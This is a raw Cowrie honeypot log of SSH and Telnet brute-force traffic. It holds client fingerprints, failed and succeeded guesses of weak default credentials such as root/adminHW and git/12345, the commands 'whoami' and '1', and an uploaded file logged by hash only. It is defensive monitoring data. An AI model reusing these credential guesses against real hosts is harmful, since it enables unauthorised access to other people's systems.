{"eventid":"cowrie.login.failed","username":"backup","password":"abcd1234","message":"login attempt [backup/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T13:02:39.592677Z","src_ip":"80.94.95.15","session":"30bddde50ebb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51948,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a19c544a242","protocol":"telnet","message":"New connection: 212.227.235.229:51948 (1.2.3.4:23) [session: 7a19c544a242]","sensor":"my-vps","timestamp":"2025-08-28T13:02:40.093242Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:02:40.285791Z","src_ip":"212.227.235.229","session":"7a19c544a242"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:02:40.306993Z","src_ip":"212.227.235.229","session":"7a19c544a242"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T13:02:40.308268Z","src_ip":"212.227.235.229","session":"7a19c544a242"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T13:02:40.309071Z","src_ip":"212.227.235.229","session":"7a19c544a242"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abc1234","message":"login attempt [backup/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T13:02:40.648802Z","src_ip":"80.94.95.15","session":"30bddde50ebb"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:02:41.706265Z","src_ip":"80.94.95.15","session":"30bddde50ebb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39706,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9f734d6303b","protocol":"ssh","message":"New connection: 212.227.235.229:39706 (1.2.3.4:22) [session: b9f734d6303b]","sensor":"my-vps","timestamp":"2025-08-28T13:02:41.719620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:02:41.924850Z","src_ip":"212.227.235.229","session":"b9f734d6303b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T13:02:42.242473Z","src_ip":"212.227.235.229","session":"b9f734d6303b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46668,"dst_ip":"1.2.3.4","dst_port":22,"session":"38f619ab2214","protocol":"ssh","message":"New connection: 212.227.125.160:46668 (1.2.3.4:22) [session: 38f619ab2214]","sensor":"my-vps","timestamp":"2025-08-28T13:02:44.562444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:02:44.563147Z","src_ip":"212.227.125.160","session":"38f619ab2214"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:02:44.733881Z","src_ip":"212.227.125.160","session":"38f619ab2214"}
{"eventid":"cowrie.login.success","username":"root","password":"100000","message":"login attempt [root/100000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:02:44.777104Z","src_ip":"212.227.235.229","session":"b9f734d6303b"}
{"eventid":"cowrie.login.failed","username":"git","password":"12345","message":"login attempt [git/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:02:45.250210Z","src_ip":"212.227.125.160","session":"38f619ab2214"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:02:45.573111Z","src_ip":"212.227.235.229","session":"b9f734d6303b"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T13:02:45.573867Z","src_ip":"212.227.235.229","session":"b9f734d6303b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:02:45.883016Z","src_ip":"212.227.235.229","session":"b9f734d6303b"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:02:45.909396Z","src_ip":"212.227.235.229","session":"b9f734d6303b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:02:46.422523Z","src_ip":"212.227.125.160","session":"38f619ab2214"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57032,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1f4bedc7b1e","protocol":"ssh","message":"New connection: 212.227.125.160:57032 (1.2.3.4:22) [session: f1f4bedc7b1e]","sensor":"my-vps","timestamp":"2025-08-28T13:03:18.625274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:03:18.626253Z","src_ip":"212.227.125.160","session":"f1f4bedc7b1e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:03:18.793025Z","src_ip":"212.227.125.160","session":"f1f4bedc7b1e"}
{"eventid":"cowrie.login.failed","username":"git","password":"12345678","message":"login attempt [git/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T13:03:19.295607Z","src_ip":"212.227.125.160","session":"f1f4bedc7b1e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:03:20.464934Z","src_ip":"212.227.125.160","session":"f1f4bedc7b1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60832,"dst_ip":"1.2.3.4","dst_port":22,"session":"298acea28499","protocol":"ssh","message":"New connection: 212.227.125.160:60832 (1.2.3.4:22) [session: 298acea28499]","sensor":"my-vps","timestamp":"2025-08-28T13:03:55.079811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:03:55.081448Z","src_ip":"212.227.125.160","session":"298acea28499"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:03:55.352545Z","src_ip":"212.227.125.160","session":"298acea28499"}
{"eventid":"cowrie.login.failed","username":"git","password":"qwerty","message":"login attempt [git/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T13:03:55.985609Z","src_ip":"212.227.125.160","session":"298acea28499"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:03:57.167246Z","src_ip":"212.227.125.160","session":"298acea28499"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37376,"dst_ip":"1.2.3.4","dst_port":23,"session":"961fa659b09c","protocol":"telnet","message":"New connection: 212.227.235.229:37376 (1.2.3.4:23) [session: 961fa659b09c]","sensor":"my-vps","timestamp":"2025-08-28T13:04:28.004294Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40136,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f78fc8eaf4e","protocol":"ssh","message":"New connection: 212.227.125.160:40136 (1.2.3.4:22) [session: 7f78fc8eaf4e]","sensor":"my-vps","timestamp":"2025-08-28T13:04:31.002704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:04:31.004934Z","src_ip":"212.227.125.160","session":"7f78fc8eaf4e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:04:31.172737Z","src_ip":"212.227.125.160","session":"7f78fc8eaf4e"}
{"eventid":"cowrie.login.failed","username":"git","password":"123123","message":"login attempt [git/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:04:31.982387Z","src_ip":"212.227.125.160","session":"7f78fc8eaf4e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:04:33.151552Z","src_ip":"212.227.125.160","session":"7f78fc8eaf4e"}
{"eventid":"cowrie.session.closed","duration":20.33074641227722,"message":"Connection lost after 20 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:04:48.334970Z","src_ip":"212.227.235.229","session":"961fa659b09c"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/38ad8fb3bcf873fbe353c552581478884275e801cdd55a3fab81c257c109a28a","shasum":"38ad8fb3bcf873fbe353c552581478884275e801cdd55a3fab81c257c109a28a","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/38ad8fb3bcf873fbe353c552581478884275e801cdd55a3fab81c257c109a28a","sensor":"my-vps","timestamp":"2025-08-28T13:04:56.581415Z","src_ip":"212.227.235.229","session":"baeea0ddb294"}
{"eventid":"cowrie.session.closed","duration":"301.1","message":"Connection lost after 301.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:04:56.583729Z","src_ip":"212.227.235.229","session":"baeea0ddb294"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33198,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c8c74a8a584","protocol":"ssh","message":"New connection: 212.227.235.229:33198 (1.2.3.4:22) [session: 6c8c74a8a584]","sensor":"my-vps","timestamp":"2025-08-28T13:04:58.326363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:04:58.327516Z","src_ip":"212.227.235.229","session":"6c8c74a8a584"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:04:58.536104Z","src_ip":"212.227.235.229","session":"6c8c74a8a584"}
{"eventid":"cowrie.login.failed","username":"taiko","password":"taiko","message":"login attempt [taiko/taiko] failed","sensor":"my-vps","timestamp":"2025-08-28T13:04:59.412996Z","src_ip":"212.227.235.229","session":"6c8c74a8a584"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:05:00.624610Z","src_ip":"212.227.235.229","session":"6c8c74a8a584"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39742,"dst_ip":"1.2.3.4","dst_port":22,"session":"7aa485392b1c","protocol":"ssh","message":"New connection: 212.227.125.160:39742 (1.2.3.4:22) [session: 7aa485392b1c]","sensor":"my-vps","timestamp":"2025-08-28T13:05:08.269927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:05:08.278622Z","src_ip":"212.227.125.160","session":"7aa485392b1c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:05:08.435585Z","src_ip":"212.227.125.160","session":"7aa485392b1c"}
{"eventid":"cowrie.login.failed","username":"git","password":"111111","message":"login attempt [git/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T13:05:09.096031Z","src_ip":"212.227.125.160","session":"7aa485392b1c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:05:10.262957Z","src_ip":"212.227.125.160","session":"7aa485392b1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55486,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cad065946a9","protocol":"ssh","message":"New connection: 212.227.125.160:55486 (1.2.3.4:22) [session: 1cad065946a9]","sensor":"my-vps","timestamp":"2025-08-28T13:05:20.929377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:05:20.930312Z","src_ip":"212.227.125.160","session":"1cad065946a9"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T13:05:21.146567Z","src_ip":"212.227.125.160","session":"1cad065946a9"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:05:28.929692Z","src_ip":"212.227.125.160","session":"1cad065946a9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50198,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea73fbec3b35","protocol":"ssh","message":"New connection: 217.72.205.35:50198 (1.2.3.4:22) [session: ea73fbec3b35]","sensor":"my-vps","timestamp":"2025-08-28T13:05:34.001615Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:05:34.003316Z","src_ip":"217.72.205.35","session":"ea73fbec3b35"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:05:40.314308Z","src_ip":"212.227.235.229","session":"7a19c544a242"}
{"eventid":"cowrie.session.closed","duration":180.22466802597046,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:05:40.317833Z","src_ip":"212.227.235.229","session":"7a19c544a242"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45840,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a0556ebebe4","protocol":"ssh","message":"New connection: 212.227.125.160:45840 (1.2.3.4:22) [session: 9a0556ebebe4]","sensor":"my-vps","timestamp":"2025-08-28T13:05:44.578448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:05:44.579208Z","src_ip":"212.227.125.160","session":"9a0556ebebe4"}
